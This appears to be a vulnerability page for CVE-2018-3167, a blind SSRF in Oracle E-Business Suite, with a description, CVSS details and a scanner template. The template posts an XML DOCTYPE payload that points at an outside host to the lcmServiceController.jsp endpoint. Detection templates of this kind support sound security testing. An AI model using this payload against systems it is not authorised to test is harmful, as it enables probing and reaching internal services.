CVE-2018-3167: Oracle E-Business Suite - Blind SSRF

2025-08-01 Oracle E-Business Suite PoC Public

Description

Oracle E-Business Suite, Application Management Pack component (User Monitoring subcomponent), is susceptible to blind server-side request forgery. An attacker with network access via HTTP can gain read access to a subset of data, connect to internal services like HTTP-enabled databases, or perform post requests towards internal services which are not intended to be exposed. Affected supported versions are 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, and 12.2.7.

PoC

id: CVE-2018-3167

info:
  name: Oracle E-Business Suite - Blind SSRF
  author: geeknik
  severity: medium
  description: Oracle E-Business Suite, Application Management Pack component (User Monitoring subcomponent), is susceptible to blind server-side request forgery. An attacker with network access via HTTP can gain read access to a subset of data, connect to internal services like HTTP-enabled databases, or perform post requests towards internal services which are not intended to be exposed. Affected supported versions are 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, and 12.2.7.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.
  reference:
    - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
    - http://web.archive.org/web/20211206102649/https://securitytracker.com/id/1041897
    - https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
    - https://nvd.nist.gov/vuln/detail/CVE-2018-3167
    - http://www.securitytracker.com/id/1041897
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2018-3167
    epss-score: 0.17118
    epss-percentile: 0.96922
    cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: application_management_pack
    framework: e-business_suite
  tags: cve,cve2018,oracle,ebs,ssrf,blind,e-business_suite,vuln

http:
  - method: POST
    path:
      - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'

    body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://interact.sh">

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Unexpected text in DTD'

      - type: status
        status:
          - 200
# digest: 490a0046304402207abdab7009da7ccee2d22fb5feb5062e5fc6cd8019c45eb36192875373d150a50220507d88f01dd73d4f76d88a2f4139e153387374397b152e5ff2b1c8b67726bc99:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities